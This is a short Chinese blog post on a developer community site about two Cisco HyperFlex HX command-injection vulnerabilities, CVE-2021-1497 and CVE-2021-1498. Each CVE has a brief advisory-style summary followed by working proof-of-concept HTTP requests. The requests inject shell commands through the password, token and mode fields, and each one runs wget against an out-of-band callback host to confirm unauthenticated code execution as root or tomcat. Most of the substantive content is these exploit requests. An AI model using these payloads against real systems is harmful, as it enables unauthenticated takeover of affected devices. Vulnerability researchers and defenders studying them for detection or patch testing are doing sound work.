Cisco HyperFlex HX命令注入漏洞 CVE-2021-1497/CVE-2021-1498
原创Cisco HyperFlex HX命令注入漏洞 CVE-2021-1497/CVE-2021-1498
原创
Khan安全团队
修改于 2021-10-18 16:03:15
修改于 2021-10-18 16:03:15
CVE-2021-1497:Cisco HyperFlex HX安装程序虚拟机命令注入漏洞
CVE ID:CVE-2021-1497 安全影响等级(SIR):严重 CVSS基本得分:9.8
Cisco HyperFlex HX Installer虚拟机基于Web的管理界面中的漏洞可能允许未经身份验证的远程攻击者对受影响的设备执行命令注入攻击。
此漏洞是由于对用户提供的输入的验证不足而引起的。攻击者可以通过向基于Web的管理界面发送精心设计的请求来利用此漏洞。成功利用此漏洞可能允许攻击者以root 用户身份在受影响的设备上执行任意命令。
POST /auth/change HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}}POST /auth HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}}
CVE-2021-1498:Cisco HyperFlex HX数据平台命令注入漏洞
CVE ID:CVE-2021-1498 安全影响等级(SIR):高 CVSS基本分数:7.3
Cisco HyperFlex HX数据平台基于Web的管理界面中的漏洞可能允许未经身份验证的远程攻击者对受影响的设备执行命令注入攻击。
此漏洞是由于对用户提供的输入的验证不足而引起的。攻击者可以通过向基于Web的管理界面发送精心设计的请求来利用此漏洞。成功利用该漏洞可能使攻击者以tomcat8 用户的身份在受影响的设备上执行任意命令。
POST /storfs-asup HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
评论
登录后参与评论
推荐阅读